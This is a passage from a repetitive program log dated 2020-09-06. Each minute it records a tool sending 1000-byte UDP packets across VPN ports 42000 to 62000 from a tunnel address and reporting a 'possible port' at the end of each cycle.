1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:16:04 -Starting port fill at 2020-09-06 12:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:17:04 -Starting port fill at 2020-09-06 12:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:18:04 -Starting port fill at 2020-09-06 12:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 12:19:07 -Starting port fill at 2020-09-06 12:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:20:04 -Starting port fill at 2020-09-06 12:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:21:05 -Starting port fill at 2020-09-06 12:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:22:05 -Starting port fill at 2020-09-06 12:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:23:06 -Starting port fill at 2020-09-06 12:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:24:05 -Starting port fill at 2020-09-06 12:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:25:05 -Starting port fill at 2020-09-06 12:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:26:05 -Starting port fill at 2020-09-06 12:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:27:06 -Starting port fill at 2020-09-06 12:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:28:04 -Starting port fill at 2020-09-06 12:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:29:05 -Starting port fill at 2020-09-06 12:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:30:04 -Starting port fill at 2020-09-06 12:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:31:05 -Starting port fill at 2020-09-06 12:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:32:04 -Starting port fill at 2020-09-06 12:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:33:05 -Starting port fill at 2020-09-06 12:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:34:06 -Starting port fill at 2020-09-06 12:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:35:04 -Starting port fill at 2020-09-06 12:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:36:04 -Starting port fill at 2020-09-06 12:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 12:37:04 -Starting port fill at 2020-09-06 12:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range 